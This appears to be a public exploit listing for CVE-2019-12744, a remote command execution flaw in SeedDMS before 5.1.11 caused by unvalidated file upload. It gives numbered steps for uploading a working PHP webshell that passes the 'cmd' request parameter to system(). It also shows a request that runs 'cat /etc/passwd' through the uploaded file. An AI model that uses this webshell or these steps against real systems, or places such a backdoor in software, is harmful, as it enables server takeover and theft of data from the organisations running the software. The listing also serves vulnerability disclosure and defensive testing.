Share
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]  
# Google Dork: [NA]  
# Date: [20-June-2019]  
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)  
# Vendor Homepage: [https://www.seeddms.org]  
# Software Link: [https://sourceforge.net/projects/seeddms/files/]  
# Version: [SeedDMS versions <5.1.11] (REQUIRED)  
# Tested on: [NA]  
# CVE : [CVE-2019-12744]  
  
Exploit Steps:  
  
Step 1: Login to the application and under any folder add a document.  
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.  
  
PHP Backdoor Code:   
<?php  
  
if(isset($_REQUEST['cmd'])){  
echo "<pre>";  
$cmd = ($_REQUEST['cmd']);  
system($cmd);  
echo "</pre>";  
die;  
}  
  
?>  
  
Step 3: Now after uploading the file check the document id corresponding to the document.  
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.  
  
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.